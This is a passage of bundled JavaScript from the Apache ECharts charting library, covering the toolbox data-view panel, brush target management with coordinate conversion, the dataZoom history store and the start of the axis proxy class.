RegExp('\\n*' + BLOCK_SPLITER + '\\n*', 'g'));\n    var newOption = {\n        series: []\n    };\n    each$1(blocks, function (block, idx) {\n        if (isTSVFormat(block)) {\n            var result = parseTSVContents(block);\n            var blockMeta = blockMetaList[idx];\n            var axisKey = blockMeta.axisDim + 'Axis';\n\n            if (blockMeta) {\n                newOption[axisKey] = newOption[axisKey] || [];\n                newOption[axisKey][blockMeta.axisIndex] = {\n                    data: result.categories\n                };\n                newOption.series = newOption.series.concat(result.series);\n            }\n        }\n        else {\n            var result = parseListContents(block);\n            newOption.series.push(result);\n        }\n    });\n    return newOption;\n}\n\n/**\n * @alias {module:echarts/component/toolbox/feature/DataView}\n * @constructor\n * @param {module:echarts/model/Model} model\n */\nfunction DataView(model) {\n\n    this._dom = null;\n\n    this.model = model;\n}\n\nDataView.defaultOption = {\n    show: true,\n    readOnly: false,\n    optionToContent: null,\n    contentToOption: null,\n\n    icon: 'M17.5,17.3H33 M17.5,17.3H33 M45.4,29.5h-28 M11.5,2v56H51V14.8L38.4,2H11.5z M38.4,2.2v12.7H51 M45.4,41.7h-28',\n    title: clone(dataViewLang.title),\n    lang: clone(dataViewLang.lang),\n    backgroundColor: '#fff',\n    textColor: '#000',\n    textareaColor: '#fff',\n    textareaBorderColor: '#333',\n    buttonColor: '#c23531',\n    buttonTextColor: '#fff'\n};\n\nDataView.prototype.onclick = function (ecModel, api) {\n    var container = api.getDom();\n    var model = this.model;\n    if (this._dom) {\n        container.removeChild(this._dom);\n    }\n    var root = document.createElement('div');\n    root.style.cssText = 'position:absolute;left:5px;top:5px;bottom:5px;right:5px;';\n    root.style.backgroundColor = model.get('backgroundColor') || '#fff';\n\n    // Create elements\n    var header = document.createElement('h4');\n    var lang$$1 = model.get('lang') || [];\n    header.innerHTML = lang$$1[0] || model.get('title');\n    header.style.cssText = 'margin: 10px 20px;';\n    header.style.color = model.get('textColor');\n\n    var viewMain = document.createElement('div');\n    var textarea = document.createElement('textarea');\n    viewMain.style.cssText = 'display:block;width:100%;overflow:auto;';\n\n    var optionToContent = model.get('optionToContent');\n    var contentToOption = model.get('contentToOption');\n    var result = getContentFromModel(ecModel);\n    if (typeof optionToContent === 'function') {\n        var htmlOrDom = optionToContent(api.getOption());\n        if (typeof htmlOrDom === 'string') {\n            viewMain.innerHTML = htmlOrDom;\n        }\n        else if (isDom(htmlOrDom)) {\n            viewMain.appendChild(htmlOrDom);\n        }\n    }\n    else {\n        // Use default textarea\n        viewMain.appendChild(textarea);\n        textarea.readOnly = model.get('readOnly');\n        textarea.style.cssText = 'width:100%;height:100%;font-family:monospace;font-size:14px;line-height:1.6rem;';\n        textarea.style.color = model.get('textColor');\n        textarea.style.borderColor = model.get('textareaBorderColor');\n        textarea.style.backgroundColor = model.get('textareaColor');\n        textarea.value = result.value;\n    }\n\n    var blockMetaList = result.meta;\n\n    var buttonContainer = document.createElement('div');\n    buttonContainer.style.cssText = 'position:absolute;bottom:0;left:0;right:0;';\n\n    var buttonStyle = 'float:right;margin-right:20px;border:none;'\n        + 'cursor:pointer;padding:2px 5px;font-size:12px;border-radius:3px';\n    var closeButton = document.createElement('div');\n    var refreshButton = document.createElement('div');\n\n    buttonStyle += ';background-color:' + model.get('buttonColor');\n    buttonStyle += ';color:' + model.get('buttonTextColor');\n\n    var self = this;\n\n    function close() {\n        container.removeChild(root);\n        self._dom = null;\n    }\n    addEventListener(closeButton, 'click', close);\n\n    addEventListener(refreshButton, 'click', function () {\n        var newOption;\n        try {\n            if (typeof contentToOption === 'function') {\n                newOption = contentToOption(viewMain, api.getOption());\n            }\n            else {\n                newOption = parseContents(textarea.value, blockMetaList);\n            }\n        }\n        catch (e) {\n            close();\n            throw new Error('Data view format error ' + e);\n        }\n        if (newOption) {\n            api.dispatchAction({\n                type: 'changeDataView',\n                newOption: newOption\n            });\n        }\n\n        close();\n    });\n\n    closeButton.innerHTML = lang$$1[1];\n    refreshButton.innerHTML = lang$$1[2];\n    refreshButton.style.cssText = buttonStyle;\n    closeButton.style.cssText = buttonStyle;\n\n    !model.get('readOnly') && buttonContainer.appendChild(refreshButton);\n    buttonContainer.appendChild(closeButton);\n\n    root.appendChild(header);\n    root.appendChild(viewMain);\n    root.appendChild(buttonContainer);\n\n    viewMain.style.height = (container.clientHeight - 80) + 'px';\n\n    container.appendChild(root);\n    this._dom = root;\n};\n\nDataView.prototype.remove = function (ecModel, api) {\n    this._dom && api.getDom().removeChild(this._dom);\n};\n\nDataView.prototype.dispose = function (ecModel, api) {\n    this.remove(ecModel, api);\n};\n\n/**\n * @inner\n */\nfunction tryMergeDataOption(newData, originalData) {\n    return map(newData, function (newVal, idx) {\n        var original = originalData && originalData[idx];\n        if (isObject$1(original) && !isArray(original)) {\n            if (isObject$1(newVal) && !isArray(newVal)) {\n                newVal = newVal.value;\n            }\n            // Original data has option\n            return defaults({\n                value: newVal\n            }, original);\n        }\n        else {\n            return newVal;\n        }\n    });\n}\n\nregister$1('dataView', DataView);\n\nregisterAction({\n    type: 'changeDataView',\n    event: 'dataViewChanged',\n    update: 'prepareAndUpdate'\n}, function (payload, ecModel) {\n    var newSeriesOptList = [];\n    each$1(payload.newOption.series, function (seriesOpt) {\n        var seriesModel = ecModel.getSeriesByName(seriesOpt.name)[0];\n        if (!seriesModel) {\n            // New created series\n            // Geuss the series type\n            newSeriesOptList.push(extend({\n                // Default is scatter\n                type: 'scatter'\n            }, seriesOpt));\n        }\n        else {\n            var originalData = seriesModel.get('data');\n            newSeriesOptList.push({\n                name: seriesOpt.name,\n                data: tryMergeDataOption(seriesOpt.data, originalData)\n            });\n        }\n    });\n\n    ecModel.mergeOption(defaults({\n        series: newSeriesOptList\n    }, payload.newOption));\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar each$17 = each$1;\nvar indexOf$1 = indexOf;\nvar curry$4 = curry;\n\nvar COORD_CONVERTS = ['dataToPoint', 'pointToData'];\n\n// FIXME\n// how to genarialize to more coordinate systems.\nvar INCLUDE_FINDER_MAIN_TYPES = [\n    'grid', 'xAxis', 'yAxis', 'geo', 'graph',\n    'polar', 'radiusAxis', 'angleAxis', 'bmap'\n];\n\n/**\n * [option in constructor]:\n * {\n *     Index/Id/Name of geo, xAxis, yAxis, grid: See util/model#parseFinder.\n * }\n *\n *\n * [targetInfo]:\n *\n * There can be multiple axes in a single targetInfo. Consider the case\n * of `grid` component, a targetInfo represents a grid which contains one or more\n * cartesian and one or more axes. And consider the case of parallel system,\n * which has multiple axes in a coordinate system.\n * Can be {\n *     panelId: ...,\n *     coordSys: <a representitive cartesian in grid (first cartesian by default)>,\n *     coordSyses: all cartesians.\n *     gridModel: <grid component>\n *     xAxes: correspond to coordSyses on index\n *     yAxes: correspond to coordSyses on index\n * }\n * or {\n *     panelId: ...,\n *     coordSys: <geo coord sys>\n *     coordSyses: [<geo coord sys>]\n *     geoModel: <geo component>\n * }\n *\n *\n * [panelOpt]:\n *\n * Make from targetInfo. Input to BrushController.\n * {\n *     panelId: ...,\n *     rect: ...\n * }\n *\n *\n * [area]:\n *\n * Generated by BrushController or user input.\n * {\n *     panelId: Used to locate coordInfo directly. If user inpput, no panelId.\n *     brushType: determine how to convert to/from coord('rect' or 'polygon' or 'lineX/Y').\n *     Index/Id/Name of geo, xAxis, yAxis, grid: See util/model#parseFinder.\n *     range: pixel range.\n *     coordRange: representitive coord range (the first one of coordRanges).\n *     coordRanges: <Array> coord ranges, used in multiple cartesian in one grid.\n * }\n */\n\n/**\n * @param {Object} option contains Index/Id/Name of xAxis/yAxis/geo/grid\n *        Each can be {number|Array.<number>}. like: {xAxisIndex: [3, 4]}\n * @param {module:echarts/model/Global} ecModel\n * @param {Object} [opt]\n * @param {Array.<string>} [opt.include] include coordinate system types.\n */\nfunction BrushTargetManager(option, ecModel, opt) {\n    /**\n     * @private\n     * @type {Array.<Object>}\n     */\n    var targetInfoList = this._targetInfoList = [];\n    var info = {};\n    var foundCpts = parseFinder$1(ecModel, option);\n\n    each$17(targetInfoBuilders, function (builder, type) {\n        if (!opt || !opt.include || indexOf$1(opt.include, type) >= 0) {\n            builder(foundCpts, targetInfoList, info);\n        }\n    });\n}\n\nvar proto$5 = BrushTargetManager.prototype;\n\nproto$5.setOutputRanges = function (areas, ecModel) {\n    this.matchOutputRanges(areas, ecModel, function (area, coordRange, coordSys) {\n        (area.coordRanges || (area.coordRanges = [])).push(coordRange);\n        // area.coordRange is the first of area.coordRanges\n        if (!area.coordRange) {\n            area.coordRange = coordRange;\n            // In 'category' axis, coord to pixel is not reversible, so we can not\n            // rebuild range by coordRange accrately, which may bring trouble when\n            // brushing only one item. So we use __rangeOffset to rebuilding range\n            // by coordRange. And this it only used in brush component so it is no\n            // need to be adapted to coordRanges.\n            var result = coordConvert[area.brushType](0, coordSys, coordRange);\n            area.__rangeOffset = {\n                offset: diffProcessor[area.brushType](result.values, area.range, [1, 1]),\n                xyMinMax: result.xyMinMax\n            };\n        }\n    });\n};\n\nproto$5.matchOutputRanges = function (areas, ecModel, cb) {\n    each$17(areas, function (area) {\n        var targetInfo = this.findTargetInfo(area, ecModel);\n\n        if (targetInfo && targetInfo !== true) {\n            each$1(\n                targetInfo.coordSyses,\n                function (coordSys) {\n                    var result = coordConvert[area.brushType](1, coordSys, area.range);\n                    cb(area, result.values, coordSys, ecModel);\n                }\n            );\n        }\n    }, this);\n};\n\nproto$5.setInputRanges = function (areas, ecModel) {\n    each$17(areas, function (area) {\n        var targetInfo = this.findTargetInfo(area, ecModel);\n\n        if (__DEV__) {\n            assert$1(\n                !targetInfo || targetInfo === true || area.coordRange,\n                'coordRange must be specified when coord index specified.'\n            );\n            assert$1(\n                !targetInfo || targetInfo !== true || area.range,\n                'range must be specified in global brush.'\n            );\n        }\n\n        area.range = area.range || [];\n\n        // convert coordRange to global range and set panelId.\n        if (targetInfo && targetInfo !== true) {\n            area.panelId = targetInfo.panelId;\n            // (1) area.range shoule always be calculate from coordRange but does\n            // not keep its original value, for the sake of the dataZoom scenario,\n            // where area.coordRange remains unchanged but area.range may be changed.\n            // (2) Only support converting one coordRange to pixel range in brush\n            // component. So do not consider `coordRanges`.\n            // (3) About __rangeOffset, see comment above.\n            var result = coordConvert[area.brushType](0, targetInfo.coordSys, area.coordRange);\n            var rangeOffset = area.__rangeOffset;\n            area.range = rangeOffset\n                ? diffProcessor[area.brushType](\n                    result.values,\n                    rangeOffset.offset,\n                    getScales(result.xyMinMax, rangeOffset.xyMinMax)\n                )\n                : result.values;\n        }\n    }, this);\n};\n\nproto$5.makePanelOpts = function (api, getDefaultBrushType) {\n    return map(this._targetInfoList, function (targetInfo) {\n        var rect = targetInfo.getPanelRect();\n        return {\n            panelId: targetInfo.panelId,\n            defaultBrushType: getDefaultBrushType && getDefaultBrushType(targetInfo),\n            clipPath: makeRectPanelClipPath(rect),\n            isTargetByCursor: makeRectIsTargetByCursor(\n                rect, api, targetInfo.coordSysModel\n            ),\n            getLinearBrushOtherExtent: makeLinearBrushOtherExtent(rect)\n        };\n    });\n};\n\nproto$5.controlSeries = function (area, seriesModel, ecModel) {\n    // Check whether area is bound in coord, and series do not belong to that coord.\n    // If do not do this check, some brush (like lineX) will controll all axes.\n    var targetInfo = this.findTargetInfo(area, ecModel);\n    return targetInfo === true || (\n        targetInfo && indexOf$1(targetInfo.coordSyses, seriesModel.coordinateSystem) >= 0\n    );\n};\n\n/**\n * If return Object, a coord found.\n * If reutrn true, global found.\n * Otherwise nothing found.\n *\n * @param {Object} area\n * @param {Array} targetInfoList\n * @return {Object|boolean}\n */\nproto$5.findTargetInfo = function (area, ecModel) {\n    var targetInfoList = this._targetInfoList;\n    var foundCpts = parseFinder$1(ecModel, area);\n\n    for (var i = 0; i < targetInfoList.length; i++) {\n        var targetInfo = targetInfoList[i];\n        var areaPanelId = area.panelId;\n        if (areaPanelId) {\n            if (targetInfo.panelId === areaPanelId) {\n                return targetInfo;\n            }\n        }\n        else {\n            for (var i = 0; i < targetInfoMatchers.length; i++) {\n                if (targetInfoMatchers[i](foundCpts, targetInfo)) {\n                    return targetInfo;\n                }\n            }\n        }\n    }\n\n    return true;\n};\n\nfunction formatMinMax(minMax) {\n    minMax[0] > minMax[1] && minMax.reverse();\n    return minMax;\n}\n\nfunction parseFinder$1(ecModel, option) {\n    return parseFinder(\n        ecModel, option, {includeMainTypes: INCLUDE_FINDER_MAIN_TYPES}\n    );\n}\n\nvar targetInfoBuilders = {\n\n    grid: function (foundCpts, targetInfoList) {\n        var xAxisModels = foundCpts.xAxisModels;\n        var yAxisModels = foundCpts.yAxisModels;\n        var gridModels = foundCpts.gridModels;\n        // Remove duplicated.\n        var gridModelMap = createHashMap();\n        var xAxesHas = {};\n        var yAxesHas = {};\n\n        if (!xAxisModels && !yAxisModels && !gridModels) {\n            return;\n        }\n\n        each$17(xAxisModels, function (axisModel) {\n            var gridModel = axisModel.axis.grid.model;\n            gridModelMap.set(gridModel.id, gridModel);\n            xAxesHas[gridModel.id] = true;\n        });\n        each$17(yAxisModels, function (axisModel) {\n            var gridModel = axisModel.axis.grid.model;\n            gridModelMap.set(gridModel.id, gridModel);\n            yAxesHas[gridModel.id] = true;\n        });\n        each$17(gridModels, function (gridModel) {\n            gridModelMap.set(gridModel.id, gridModel);\n            xAxesHas[gridModel.id] = true;\n            yAxesHas[gridModel.id] = true;\n        });\n\n        gridModelMap.each(function (gridModel) {\n            var grid = gridModel.coordinateSystem;\n            var cartesians = [];\n\n            each$17(grid.getCartesians(), function (cartesian, index) {\n                if (indexOf$1(xAxisModels, cartesian.getAxis('x').model) >= 0\n                    || indexOf$1(yAxisModels, cartesian.getAxis('y').model) >= 0\n                ) {\n                    cartesians.push(cartesian);\n                }\n            });\n            targetInfoList.push({\n                panelId: 'grid--' + gridModel.id,\n                gridModel: gridModel,\n                coordSysModel: gridModel,\n                // Use the first one as the representitive coordSys.\n                coordSys: cartesians[0],\n                coordSyses: cartesians,\n                getPanelRect: panelRectBuilder.grid,\n                xAxisDeclared: xAxesHas[gridModel.id],\n                yAxisDeclared: yAxesHas[gridModel.id]\n            });\n        });\n    },\n\n    geo: function (foundCpts, targetInfoList) {\n        each$17(foundCpts.geoModels, function (geoModel) {\n            var coordSys = geoModel.coordinateSystem;\n            targetInfoList.push({\n                panelId: 'geo--' + geoModel.id,\n                geoModel: geoModel,\n                coordSysModel: geoModel,\n                coordSys: coordSys,\n                coordSyses: [coordSys],\n                getPanelRect: panelRectBuilder.geo\n            });\n        });\n    }\n};\n\nvar targetInfoMatchers = [\n\n    // grid\n    function (foundCpts, targetInfo) {\n        var xAxisModel = foundCpts.xAxisModel;\n        var yAxisModel = foundCpts.yAxisModel;\n        var gridModel = foundCpts.gridModel;\n\n        !gridModel && xAxisModel && (gridModel = xAxisModel.axis.grid.model);\n        !gridModel && yAxisModel && (gridModel = yAxisModel.axis.grid.model);\n\n        return gridModel && gridModel === targetInfo.gridModel;\n    },\n\n    // geo\n    function (foundCpts, targetInfo) {\n        var geoModel = foundCpts.geoModel;\n        return geoModel && geoModel === targetInfo.geoModel;\n    }\n];\n\nvar panelRectBuilder = {\n\n    grid: function () {\n        // grid is not Transformable.\n        return this.coordSys.grid.getRect().clone();\n    },\n\n    geo: function () {\n        var coordSys = this.coordSys;\n        var rect = coordSys.getBoundingRect().clone();\n        // geo roam and zoom transform\n        rect.applyTransform(getTransform(coordSys));\n        return rect;\n    }\n};\n\nvar coordConvert = {\n\n    lineX: curry$4(axisConvert, 0),\n\n    lineY: curry$4(axisConvert, 1),\n\n    rect: function (to, coordSys, rangeOrCoordRange) {\n        var xminymin = coordSys[COORD_CONVERTS[to]]([rangeOrCoordRange[0][0], rangeOrCoordRange[1][0]]);\n        var xmaxymax = coordSys[COORD_CONVERTS[to]]([rangeOrCoordRange[0][1], rangeOrCoordRange[1][1]]);\n        var values = [\n            formatMinMax([xminymin[0], xmaxymax[0]]),\n            formatMinMax([xminymin[1], xmaxymax[1]])\n        ];\n        return {values: values, xyMinMax: values};\n    },\n\n    polygon: function (to, coordSys, rangeOrCoordRange) {\n        var xyMinMax = [[Infinity, -Infinity], [Infinity, -Infinity]];\n        var values = map(rangeOrCoordRange, function (item) {\n            var p = coordSys[COORD_CONVERTS[to]](item);\n            xyMinMax[0][0] = Math.min(xyMinMax[0][0], p[0]);\n            xyMinMax[1][0] = Math.min(xyMinMax[1][0], p[1]);\n            xyMinMax[0][1] = Math.max(xyMinMax[0][1], p[0]);\n            xyMinMax[1][1] = Math.max(xyMinMax[1][1], p[1]);\n            return p;\n        });\n        return {values: values, xyMinMax: xyMinMax};\n    }\n};\n\nfunction axisConvert(axisNameIndex, to, coordSys, rangeOrCoordRange) {\n    if (__DEV__) {\n        assert$1(\n            coordSys.type === 'cartesian2d',\n            'lineX/lineY brush is available only in cartesian2d.'\n        );\n    }\n\n    var axis = coordSys.getAxis(['x', 'y'][axisNameIndex]);\n    var values = formatMinMax(map([0, 1], function (i) {\n        return to\n            ? axis.coordToData(axis.toLocalCoord(rangeOrCoordRange[i]))\n            : axis.toGlobalCoord(axis.dataToCoord(rangeOrCoordRange[i]));\n    }));\n    var xyMinMax = [];\n    xyMinMax[axisNameIndex] = values;\n    xyMinMax[1 - axisNameIndex] = [NaN, NaN];\n\n    return {values: values, xyMinMax: xyMinMax};\n}\n\nvar diffProcessor = {\n    lineX: curry$4(axisDiffProcessor, 0),\n\n    lineY: curry$4(axisDiffProcessor, 1),\n\n    rect: function (values, refer, scales) {\n        return [\n            [values[0][0] - scales[0] * refer[0][0], values[0][1] - scales[0] * refer[0][1]],\n            [values[1][0] - scales[1] * refer[1][0], values[1][1] - scales[1] * refer[1][1]]\n        ];\n    },\n\n    polygon: function (values, refer, scales) {\n        return map(values, function (item, idx) {\n            return [item[0] - scales[0] * refer[idx][0], item[1] - scales[1] * refer[idx][1]];\n        });\n    }\n};\n\nfunction axisDiffProcessor(axisNameIndex, values, refer, scales) {\n    return [\n        values[0] - scales[axisNameIndex] * refer[0],\n        values[1] - scales[axisNameIndex] * refer[1]\n    ];\n}\n\n// We have to process scale caused by dataZoom manually,\n// although it might be not accurate.\nfunction getScales(xyMinMaxCurr, xyMinMaxOrigin) {\n    var sizeCurr = getSize(xyMinMaxCurr);\n    var sizeOrigin = getSize(xyMinMaxOrigin);\n    var scales = [sizeCurr[0] / sizeOrigin[0], sizeCurr[1] / sizeOrigin[1]];\n    isNaN(scales[0]) && (scales[0] = 1);\n    isNaN(scales[1]) && (scales[1] = 1);\n    return scales;\n}\n\nfunction getSize(xyMinMax) {\n    return xyMinMax\n        ? [xyMinMax[0][1] - xyMinMax[0][0], xyMinMax[1][1] - xyMinMax[1][0]]\n        : [NaN, NaN];\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar each$18 = each$1;\n\nvar ATTR$1 = '\\0_ec_hist_store';\n\n/**\n * @param {module:echarts/model/Global} ecModel\n * @param {Object} newSnapshot {dataZoomId, batch: [payloadInfo, ...]}\n */\nfunction push(ecModel, newSnapshot) {\n    var store = giveStore(ecModel);\n\n    // If previous dataZoom can not be found,\n    // complete an range with current range.\n    each$18(newSnapshot, function (batchItem, dataZoomId) {\n        var i = store.length - 1;\n        for (; i >= 0; i--) {\n            var snapshot = store[i];\n            if (snapshot[dataZoomId]) {\n                break;\n            }\n        }\n        if (i < 0) {\n            // No origin range set, create one by current range.\n            var dataZoomModel = ecModel.queryComponents(\n                {mainType: 'dataZoom', subType: 'select', id: dataZoomId}\n            )[0];\n            if (dataZoomModel) {\n                var percentRange = dataZoomModel.getPercentRange();\n                store[0][dataZoomId] = {\n                    dataZoomId: dataZoomId,\n                    start: percentRange[0],\n                    end: percentRange[1]\n                };\n            }\n        }\n    });\n\n    store.push(newSnapshot);\n}\n\n/**\n * @param {module:echarts/model/Global} ecModel\n * @return {Object} snapshot\n */\nfunction pop(ecModel) {\n    var store = giveStore(ecModel);\n    var head = store[store.length - 1];\n    store.length > 1 && store.pop();\n\n    // Find top for all dataZoom.\n    var snapshot = {};\n    each$18(head, function (batchItem, dataZoomId) {\n        for (var i = store.length - 1; i >= 0; i--) {\n            var batchItem = store[i][dataZoomId];\n            if (batchItem) {\n                snapshot[dataZoomId] = batchItem;\n                break;\n            }\n        }\n    });\n\n    return snapshot;\n}\n\n/**\n * @param {module:echarts/model/Global} ecModel\n */\nfunction clear$1(ecModel) {\n    ecModel[ATTR$1] = null;\n}\n\n/**\n * @param {module:echarts/model/Global} ecModel\n * @return {number} records. always >= 1.\n */\nfunction count(ecModel) {\n    return giveStore(ecModel).length;\n}\n\n/**\n * [{key: dataZoomId, value: {dataZoomId, range}}, ...]\n * History length of each dataZoom may be different.\n * this._history[0] is used to store origin range.\n * @type {Array.<Object>}\n */\nfunction giveStore(ecModel) {\n    var store = ecModel[ATTR$1];\n    if (!store) {\n        store = ecModel[ATTR$1] = [{}];\n    }\n    return store;\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nComponentModel.registerSubTypeDefaulter('dataZoom', function () {\n    // Default 'slider' when no type specified.\n    return 'slider';\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar AXIS_DIMS = ['x', 'y', 'z', 'radius', 'angle', 'single'];\n// Supported coords.\nvar COORDS = ['cartesian2d', 'polar', 'singleAxis'];\n\n/**\n * @param {string} coordType\n * @return {boolean}\n */\nfunction isCoordSupported(coordType) {\n    return indexOf(COORDS, coordType) >= 0;\n}\n\n/**\n * Create \"each\" method to iterate names.\n *\n * @pubilc\n * @param  {Array.<string>} names\n * @param  {Array.<string>=} attrs\n * @return {Function}\n */\nfunction createNameEach(names, attrs) {\n    names = names.slice();\n    var capitalNames = map(names, capitalFirst);\n    attrs = (attrs || []).slice();\n    var capitalAttrs = map(attrs, capitalFirst);\n\n    return function (callback, context) {\n        each$1(names, function (name, index) {\n            var nameObj = {name: name, capital: capitalNames[index]};\n\n            for (var j = 0; j < attrs.length; j++) {\n                nameObj[attrs[j]] = name + capitalAttrs[j];\n            }\n\n            callback.call(context, nameObj);\n        });\n    };\n}\n\n/**\n * Iterate each dimension name.\n *\n * @public\n * @param {Function} callback The parameter is like:\n *                            {\n *                                name: 'angle',\n *                                capital: 'Angle',\n *                                axis: 'angleAxis',\n *                                axisIndex: 'angleAixs',\n *                                index: 'angleIndex'\n *                            }\n * @param {Object} context\n */\nvar eachAxisDim$1 = createNameEach(AXIS_DIMS, ['axisIndex', 'axis', 'index', 'id']);\n\n/**\n * If tow dataZoomModels has the same axis controlled, we say that they are 'linked'.\n * dataZoomModels and 'links' make up one or more graphics.\n * This function finds the graphic where the source dataZoomModel is in.\n *\n * @public\n * @param {Function} forEachNode Node iterator.\n * @param {Function} forEachEdgeType edgeType iterator\n * @param {Function} edgeIdGetter Giving node and edgeType, return an array of edge id.\n * @return {Function} Input: sourceNode, Output: Like {nodes: [], dims: {}}\n */\nfunction createLinkedNodesFinder(forEachNode, forEachEdgeType, edgeIdGetter) {\n\n    return function (sourceNode) {\n        var result = {\n            nodes: [],\n            records: {} // key: edgeType.name, value: Object (key: edge id, value: boolean).\n        };\n\n        forEachEdgeType(function (edgeType) {\n            result.records[edgeType.name] = {};\n        });\n\n        if (!sourceNode) {\n            return result;\n        }\n\n        absorb(sourceNode, result);\n\n        var existsLink;\n        do {\n            existsLink = false;\n            forEachNode(processSingleNode);\n        }\n        while (existsLink);\n\n        function processSingleNode(node) {\n            if (!isNodeAbsorded(node, result) && isLinked(node, result)) {\n                absorb(node, result);\n                existsLink = true;\n            }\n        }\n\n        return result;\n    };\n\n    function isNodeAbsorded(node, result) {\n        return indexOf(result.nodes, node) >= 0;\n    }\n\n    function isLinked(node, result) {\n        var hasLink = false;\n        forEachEdgeType(function (edgeType) {\n            each$1(edgeIdGetter(node, edgeType) || [], function (edgeId) {\n                result.records[edgeType.name][edgeId] && (hasLink = true);\n            });\n        });\n        return hasLink;\n    }\n\n    function absorb(node, result) {\n        result.nodes.push(node);\n        forEachEdgeType(function (edgeType) {\n            each$1(edgeIdGetter(node, edgeType) || [], function (edgeId) {\n                result.records[edgeType.name][edgeId] = true;\n            });\n        });\n    }\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar each$20 = each$1;\nvar asc$1 = asc;\n\n/**\n * Operate single axis.\n * One axis can only operated by one axis operator.\n * Different dataZoomModels may be defined to operate the same axis.\n * (i.e. 'inside' data zoom and 'slider' data zoom components)\n * So dataZoomModels share one axisProxy in that case.\n *\n * @class\n */\nvar AxisProxy = function (dimName, axisIndex, dataZoomModel, ecModel) {\n\n    /**\n     * @private\n     * @type {string}\n     */\n    this._dimName = dimName;\n\n    /**\n     * @private\n     */\n    this._axisIndex = axisIndex;\n\n    /**\n     * @private\n     * @type {Array.<number>}\n     */\n    this._valueWindow;\n\n    /**\n     * @private\n     * @type {Array.<number>}\n     */\n    this._percentWindow;\n\n    /**\n     * @private\n     * @type {Array.<number>}\n     */\n    this._dataExtent;\n\n    /**\n     * {minSpan, maxSpan, minValueSpan, maxValueSpan}\n     * @private\n     * @type {Object}\n     */\n    this._minMaxSpan;\n\n    /**\n     * @readOnly\n     * @type {module: echarts/model/Global}\n     */\n    this.ecModel = ecModel;\n\n    /**\n     * @private\n     * @type {module: echarts/component/dataZoom/DataZoomModel}\n     */\n    this._dataZoomModel = dataZoomModel;\n\n    // /**\n    //  * @readOnly\n    //  * @private\n    //  */\n    // this.hasSeriesStacked;\n};\n\nAxisProxy.prototype = {\n\n    constructor: AxisProxy,\n\n    /**\n     * Whether the axisProxy is hosted by dataZoomModel.\n     *\n     * @public\n     * @param {module: echarts/component/dataZoom/DataZoomModel} dataZoomModel\n     * @return {boolean}\n     */\n    hostedBy: function (dataZoomModel) {\n        return this._dataZoomModel === dataZoomModel;\n    },\n\n    /**\n     * @return {Array.<number>} Value can only be NaN or finite value.\n     */\n    getDataValueWindow: function () {\n        return this._valueWindow.slice();\n    },\n\n    /**\n     * @return {Array.<number>}\n     */\n    getDataPercentWindow: function () {\n        return this._percentWindow.slice();\n    },\n\n    /**\n     * @public\n     * @param {number} axisIndex\n     * @return {Array} seriesModels\n     */\n    getTargetSeriesModels: function () {\n        var seriesModels = [];\n        var ecModel = this.ecModel;\n\n        ecModel.eachSeries(function (seriesModel) {\n            if (isCoordSupported(seriesModel.get('coordinateSystem'))) {\n                var dimName = this._dimName;\n                var axisModel = ecModel.queryComponents({\n                    mainType: dimName + 'Axis',\n                    index: seriesModel.get(dimName + 'AxisIndex'),\n                    id: seriesModel.get(dimName + 'AxisId')\n                })[0];\n                if (this._axisIndex === (axisModel && axisModel.componentIndex)) {\n                    seriesModels.push(seriesModel);\n                }\n            }\n        }, this);\n\n        return seriesModels;\n    },\n\n    getAxisModel: function () {\n        return this.ecModel.getComponent(this._dimName + 'Axis', this._axisIndex);\n    },\n\n    getOtherAxisModel: function () {\n        var axisDim = this._dimName;\n        var ecModel = this.ecModel;\n        var axisModel = 